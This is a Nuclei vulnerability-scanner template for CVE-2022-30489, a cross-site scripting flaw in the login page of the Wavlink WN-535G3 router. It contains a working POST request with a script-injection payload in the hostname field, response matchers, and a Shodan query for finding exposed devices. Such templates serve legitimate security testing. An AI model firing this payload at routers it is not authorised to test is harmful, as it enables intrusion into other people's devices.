nuclei-templates/http/cves/2022/CVE-2022-30489.yaml

53 lines
1.6 KiB
YAML
Raw Normal View History

2022-05-14 07:30:47 +00:00
id: CVE-2022-30489
info:
name: Wavlink WN-535G3 - Cross-Site Scripting
2022-05-14 07:30:47 +00:00
author: For3stCo1d
severity: medium
description: |
Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi.
2022-05-14 07:30:47 +00:00
reference:
- https://github.com/badboycxcc/XSS-CVE-2022-30489
- https://github.com/badboycxcc/XSS
- https://nvd.nist.gov/vuln/detail/CVE-2022-30489
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-30489
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00099
cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:*
2022-05-14 07:30:47 +00:00
metadata:
max-request: 1
2022-05-14 07:30:47 +00:00
shodan-query: http.title:"Wi-Fi APP Login"
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: wavlink
product: wn535g3_firmware
2022-05-15 11:00:27 +00:00
tags: xss,cve2022,wavlink,cve,router,iot
2022-05-14 07:30:47 +00:00
http:
2022-05-14 07:30:47 +00:00
- raw:
- |
POST /cgi-bin/login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(document.domain);</script>'
2022-05-15 11:00:27 +00:00
- 'parent.location.replace("http://")'
condition: and
2022-05-14 07:30:47 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200